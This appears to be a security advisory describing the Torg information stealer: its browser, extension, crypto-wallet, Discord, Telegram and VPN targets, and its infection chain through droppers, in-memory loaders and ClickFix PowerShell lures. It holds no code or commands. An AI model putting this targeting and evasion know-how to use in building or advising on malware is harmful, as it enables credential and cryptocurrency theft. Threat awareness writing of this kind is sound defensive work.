Torg Stealer

Torg is a highly dangerous information-stealing malware designed to extract sensitive data from infected systems and transmit it to cybercriminals through an API-based infrastructure. It is distributed under a Malware-as-a-Service (MaaS) model, making it accessible to a wide range of threat actors. Once detected on a device, immediate removal is critical to prevent further data compromise.

Extensive Browser Targeting Capabilities

One of Torg’s primary strengths lies in its ability to compromise a wide variety of web browsers. It specifically targets Chromium-based browsers such as Chrome, Edge, Brave, and Opera, as well as Firefox-based browsers. In total, it can extract data from dozens of browsers.

The malware is capable of accessing stored login credentials, including saved passwords and cookies. It is also engineered to bypass or decrypt browser security mechanisms designed to protect this information, making even secured data vulnerable to theft.

Exploiting Browser Extensions and Sensitive Add-ons

Torg significantly expands its reach by targeting browser extensions. It is capable of extracting data from more than 800 extensions, many of which are associated with cryptocurrency wallets, including widely used options like MetaMask and Phantom. Additionally, it targets over 100 security-related extensions, including password managers and two-factor authentication tools.

Beyond financial tools, the malware also harvests information from various note-taking extensions. These extensions often store sensitive user data such as passwords, personal notes, and other confidential information, making them valuable targets for attackers.

Cryptocurrency Wallet Theft on a Large Scale

Torg poses a severe threat to cryptocurrency users by targeting both browser-based and desktop wallet applications. It can extract sensitive wallet data from over 30 desktop wallet programs, including Atomic, AtomicDEX, Bitcoin Core, Daedalus, Electrum, Ethereum, Exodus, Monero, MyEtherWallet, and WalletWasabi.

The malware is capable of stealing highly sensitive information such as wallet seeds, private keys, and session data. This level of access can allow attackers to take full control of cryptocurrency assets.

Targeting Communication, Gaming, and System Data

Torg extends its data theft capabilities to a wide range of applications and services. It can extract Discord tokens by scanning LevelDB databases, enabling unauthorized access to accounts without requiring login credentials. It also captures Telegram session data, potentially granting access to active user sessions, and steals Steam configuration files that may be used to hijack or impersonate gaming accounts.

Additional targets include:

• VPN clients (ExpressVPN, NordVPN, OpenVPN, PIA, ProtonVPN, Surfshark, WireGuard, Windscribe), FTP and remote access tools (FileZilla, mRemoteNG, MobaXterm, Total Commander, WinSCP), and email clients such as Outlook and Thunderbird
• Gaming platforms (Battle.net, GOG Galaxy, Minecraft, Origin/EA, Rockstar Games, Ubisoft Connect), along with sensitive files stored in Desktop and Documents folders
• The Impact: Severe Privacy and Financial Risks

Torg operates silently in the background, collecting a wide array of sensitive information without the user’s knowledge. This includes login credentials, financial data, personal files, and account access tokens.

Due to its broad targeting scope, infections can result in serious consequences such as identity theft, account takeovers, financial losses, and long-term privacy breaches. Its ability to compromise multiple platforms simultaneously makes it particularly destructive.

How Torg Infects Systems

The infection process typically begins when users download and execute malicious files disguised as legitimate content. These often include pirated software, cracked applications, fake installers, or game cheats. The initial payload, known as a dropper, secretly installs additional malicious components onto the system.

The attack chain involves several sophisticated stages:

• The dropper deploys hidden malware using obfuscation and encryption techniques to evade detection
• Malicious code may execute directly in memory, avoiding disk-based detection
• A loader prepares the system by hiding processes or injecting code into legitimate Windows processes

Finally, the Torg stealer is executed in memory, beginning its data exfiltration activities

ClickFix and Other Deceptive Distribution Methods

In addition to traditional infection vectors, Torg is also spread through a technique known as ClickFix. This method manipulates users into copying and executing malicious commands, often disguised as legitimate instructions. These commands are typically PowerShell scripts that, once executed, initiate the infection process and download the malware automatically.

Combined with social engineering tactics and technical obfuscation, these distribution methods make Torg a highly effective and dangerous threat that demands immediate attention and removal if detected.